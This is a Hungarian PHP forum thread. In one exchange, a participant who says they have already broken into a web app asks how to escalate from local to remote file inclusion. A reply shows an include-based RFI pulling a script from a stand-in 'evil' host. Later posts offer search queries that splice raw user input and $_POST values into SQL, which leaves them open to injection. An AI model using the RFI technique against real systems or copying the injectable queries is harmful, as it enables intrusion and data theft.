Nem feltetlenul kell a konkret peldat megosztani, linkekkel, hozzaferessel es koddal, teszem azt kaptal egy finom SQL injection-t, eleg megkerdezni mit tegyel ellene, min valtoztass, vagy mondjuk valami robot arto fajlt tol es futtata a szervereden, mit lehet tenni, esetleg hogyan authentikalj helyesen. Ezekre akkor is lehet valaszolni, ha az ember nem tudja pontosan melyik oldalrol van szo. No de nem okoskodok, ha privat, akkor legyen privat.

but without you, my life is incomplete, my days are absolutely gray

Miért, gondolom nem privát kulcsokat szeretnél megosztani? Nem attól lesz biztonságos az alkalmazás, hogy "nem tudja senki" mit használnak a háttérben, hanem a használt megoldás mennyire megbízható.

Indulásnak az OWASP lista jó lehet amúgy, ha biztonság a témakör.

“Yeah, well, you know, that’s just, like, your opinion, man.” — The Dude

Konkretan a webszerverre valo betoreshez nem gondolnam, hogy a PHP lenne a belepesi pont. Ez inkabb linux/unix varazslat kellene hogy legyen. Ha konkretan egy PHP alapu alkalmazast akarsz felnyomni, az mas. Akkor jo kiindulasi alap amit disy68 linkelt. En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit.

but without you, my life is incomplete, my days are absolutely gray

Mert php-ben van a webapp.

(#18707) DNReNTi

SQLi nem kellett, a webapp már megadta magát, a session lopás is megvolt. XSS az kicsit más tészta.

(#18708) disy68

Eljutottam valameddig, és a továbblépéshez kellene a php-s segítség. LFI megy, RFI nem, ezt kellene megoldanom valahogy. Vagy valami guru megmondja, hogy ez így nem lehetséges php-ben, és akkor keresek valami más sebezhetőséget.

(#18709) Zedz

Jó az ötlet.

[ Szerkesztve ]

RFI. Én olyannal találkoztam, hogy a routing volt megoldva ellenőrizetlen bemenetekkel szép url megoldásnál.

Pl: oldal.hu/aloldal

htaccess-el volt egy átirányítás RewriteRule ^(.*)$ /index.php?path=$1 [NC,L,QSA]

ahol az aloldal került a $path változóba, majd ez lett include-olva.
include_once($path);

Szóval meghívva a oldal.hu/http://gonoszoldal.hu/meggonoszabb_script.php
Az kerül meghívásra, hogy include_once('http://gonoszoldal.hu/meggonoszabb_script.php
');

“Yeah, well, you know, that’s just, like, your opinion, man.” — The Dude

Egyebkent mi a vegso cel? Hasznalhatatlanna tenni az appot? Lenyulni az adatokat, fajlokat? Vagy beinject-elni valami szkriptet es hosszabb tavon felhasznaloi adatokat lopni? Csak kivancsi vagyok.

but without you, my life is incomplete, my days are absolutely gray

Csináltam topikot, hogy át tudjunk vonulni oda:
https://itcafe.hu/tema/white_hat/friss.html

[ Szerkesztve ]

JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...

Ti hogyan valósítanátok meg egy foglalási rendszer kosarát? Nekem csak az jut eszembe, hogy nem sessionben tárolom a tételeket, hanem adatbázisban, és így on the fly leveszi polcról, ha valaki más megnézni.

(#18730) fordfairlane

Igen, ezt úgy küszöbölném ki, hogy mondjuk 15 percen belül meg kell rendelnie a terméket, különben törlődik a kosár. Nagyjából így működnek azok a rendszerek, amelyekkel találkoztam (mozi, színház).

[ Szerkesztve ]

Sziasztok!

A segítségeteket szeretném kérni, hogy jól működik-e a script amit írtam, mert már kezdek belekeveredni.

Szerintem jó, de lehet kihagytam valamit, vagy egyszerűbben is meglehet oldani.
A lényeg hogy két dátum (hónap, nap) között döntse el a program, hogy beleesik-e az adott időpont, a két dátum közé, vagy nem.

$ev = '2017';
//$ev = date("Y");
$mostdatum = strtotime("2017-10-05");
//$mostdatum = strtotime("now");

$szezonkezdet='09-01';
$szezonveg='05-30';

$eveleje = strtotime($ev."-01-01");
$evvege = strtotime($ev."-12-31");

$datum1 = date($ev."-".$szezonkezdet);
$datum2 = date($ev."-".$szezonveg);

$ezevszezonkezdet = strtotime($datum1);
$ezevszezonveg = strtotime($datum2);

if ($mostdatum >= $eveleje AND $mostdatum <= $ezevszezonveg)
{
$time1 = strtotime($datum1."-1 year");
$time2 = strtotime($datum2);
}

if ($mostdatum >= $ezevszezonveg AND $mostdatum <= $ezevszezonkezdet)
{
$time1 = strtotime($datum1."-1 year");
$time2 = strtotime($datum2);
}

if ($mostdatum >= $ezevszezonkezdet AND $mostdatum <= $evvege)
{
$time1 = strtotime($datum1);
$time2 = strtotime($datum2."+1 year");
}

if ($mostdatum <= $ezevszezonkezdet AND $mostdatum >= $ezevszezonveg)
{
$time1 = strtotime($datum1);
$time2 = strtotime($datum2);
}

echo date('Y-m-d', $time1);
echo '<br>';
echo date('Y-m-d', $mostdatum);
echo '<br>';
echo date('Y-m-d', $time2);

if ($mostdatum > $time1 AND $mostdatum < $time2)//szezon
{
echo 'ok';
}
else
{
echo 'error';
}

[ Szerkesztve ]

hát ha két dátum között döntenéd el, akkor ennél egyszerűbb lenne a kód, de te tulajdonképpen 4 dátum között döntöd el. 2016-09-01, 2017-05-30, 2017-09-01, 2018-05-30

Igen, mert csak hónap és nap van megadva. Év nincs megadva a szezon változóiban.
Azt ki kell számolni, hogy a jelenlegi dátum a tavalyi év szezon kezdet és az idei év szezonvég között van-e.
pl kezdet:09-01 vég:04-01 a jelenlegi dátum pedig 10-01. de lehet 01-01 is. Ilyenkor kell a tavalyi év 09-01-et venni kezdetnek.

[ Szerkesztve ]

értem.
elsőre azt gondoltam túl bonyolítottad, de ha ez volt a cél, akkor jó így.

Következő kérdés: ti hogy implementálnátok egy jó kereső logikát? Én eddig string konkatenációt használtam több keresőszó esetén és azt toltam be adatbázisba.

Tegyük fel, hogy van egy termékeket taralmazó adatbázisom műszaki cikkeknek. A keresést nyilván szótártáblákra futtatom, a kapcsolat most mindegy. Legyen márkanév, típus, megnevezés tábla és ugyanezzel a névvel mezők.

$sql = "SELECT markanev, tipus, megnevezes FROM markanev, tipus, megnevezes WHERE 1=1"

foreach($keresoszavak as $keresoszo){

$sql .= "AND (markanev LIKE '%".$keresoszo."%' OR tipus LIKE '%".$keresoszo."%' OR megnevezes LIKE '%".$keresoszo."%')"

}

Ez csak egy példa, nyilván mindenki ismeri. Biztos van ennél kulturáltabb módszer, ti mire esküsztök?

(#18737) PumpkinSeed

Az kimaradt, hogy osztott tárhelyes LAMP környezetben.

[ Szerkesztve ]

Elasticsearch, Solr

"Akinek elég bátorsága és türelme van ahhoz, hogy egész életében a sötétségbe nézzen, elsőként fogja meglátni benne a fény felvillanását." - Kán

Szerintem ez már itt rossz
SELECT markanev, tipus, megnevezes FROM markanev, tipus, megnevezes
meg a lezáró ;-k stb
ezt most csak ide bepötyögted, nem másoltad éles kódból...

[ Szerkesztve ]

Elektromos autó töltő berendezések | Mesterséges növényvilágítás | Mai ajánlatunk: www.gerisoft.hu | www.e-autotoltokabel.hu | www.agrar-vilagitas.hu |

Nyilván a logika a lényeg, nem kimásoltam.

nem szép, de ez is működő megoldás, ha saját főből kell írni.
Persze pdo-val még szebb lenne.
Persze indexelt táblán, mert különben 10-20mp is lehet egy 100.000 soros táblában 3-4 szóra keresni.

Aztán ezért lehet megköveznek, mert ez még mysql_* féle megoldás volt, de én mondjuk a match-against párossal keresnék, mert akkor a rendezést lehet score alapján végezni, mennyire releváns az összetett keresés

$termekek = mysql_query("SELECT *, MATCH (termek_nev, termek_leiras, termek_cikkszam, termek_szall_code, termek_ean) AGAINST ('$keresett*' IN BOOLEAN MODE) AS score FROM webshop_termekek WHERE MATCH (termek_nev, termek_leiras, termek_cikkszam, termek_szall_code, termek_ean) AGAINST('$keresett*' IN BOOLEAN MODE) ORDER BY $order LIMIT {$_POST['start']},$lapozas");

ez egy működő copypaste
és nem kell ciklusban összefűzni a szavakat.

Elektromos autó töltő berendezések | Mesterséges növényvilágítás | Mai ajánlatunk: www.gerisoft.hu | www.e-autotoltokabel.hu | www.agrar-vilagitas.hu |

Hello,

Hülye kérdés.
Linuxon futtatok egy shell scriptet PHP-ból. A kimenetét hogyan tudom/hogyan érdemes elkapni, hogy tudjam formázni?
Gondolom ha a script kimenetében HTML tageket generálok, az nem lesz értelmezve.
Köszi bármilyen ötletet

Mutogatni való hater díszpinty

Halik.

Egy szövegalapú böngészős játékot írok (mint a sárkányölő pl) és akárhogy kerülgetem szerveridős matekezéssel meg mindenféle megoldásokkal, szükségem lenne arra, hogy tudjak dolgokat előre meghatározott időnként auto megcsinálni, pl cselekvéslimit, shop kínálatfrissítés stb..
Mire van ezekhez szükségem?

ui: wampserverrel dolgozom w10en

[ Szerkesztve ]

Bagoly mondja verébnek, hogy nagy a feje, búsuljon a ló.

Cron a kulcsszo amit keresel.

but without you, my life is incomplete, my days are absolutely gray

Azt lehet csak úgy mezeileg is? Amiket én kaptam az vagy linuxon van vagy laravel framework. S linux nem lesz szóval kezdjek el laravelt tanulni vagy vagy van olyan megoldás ami barát a wampserveres apache-mysql-php kombóval?

[ Szerkesztve ]

Bagoly mondja verébnek, hogy nagy a feje, búsuljon a ló.

Vagy linuxxal jobban járnék?

Bagoly mondja verébnek, hogy nagy a feje, búsuljon a ló.

Windowson nem lehet cronjobokat beallitani, de az elkepzelheto, hogy van ra valami 3rd party tool. Ettol fuggetlenul, en inkabb a linuxos kornyezetet javasolnam. Az idozitett hatterfolyamat pedig nem framework fuggo, tehat tok mindegy, hogy Laravel, vagy Codeigniter, vagy akarmi.

but without you, my life is incomplete, my days are absolutely gray

Terminalban akarod latni a kimenetet?
Ha igen, a formazasi lehetosegek eleg korlatozottak, kiiratni az echo, es a print csalad fuggvenyeivel tudsz, illetve feladat fuggvenyeben megfontolando output buffering hasznalata.

but without you, my life is incomplete, my days are absolutely gray

Hello,
Nem, HTML-re akarom kirakni. Az echo $output működik, csak nagyon fapadosan néz ki.

Mutogatni való hater díszpinty

Ah, ertem, akkor egyszerubb a helyzet. A HTML tagek a bongeszo altal feldolgozodnak, tehat siman megjelenik, ugyan ugy mintha az egy mezei HTML file lenni.
Peldaul xyz.php file tartalma teszem azt:

<?php
$title = 'Hello World';
?>

<h1>
<?php echo $title; ?>
</h1>

but without you, my life is incomplete, my days are absolutely gray